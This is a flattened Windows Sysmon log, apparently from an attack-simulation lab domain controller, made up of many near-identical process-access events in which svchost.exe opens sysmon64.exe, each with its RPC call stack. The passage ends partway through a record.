13:09:45.282{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001502Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.282{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001501Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.282{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001500Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.282{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001499Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.282{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001498Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.282{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001497Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.282{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001496Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.282{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001495Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.282{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001494Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.282{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001493Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.282{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001492Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.263{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001491Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.263{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001490Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.263{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001489Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.263{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001488Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.262{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001487Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.262{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001486Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.262{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001485Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.262{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001484Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.262{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001483Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.239{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001482Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.239{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001481Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.239{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001480Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.239{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001479Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.239{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C: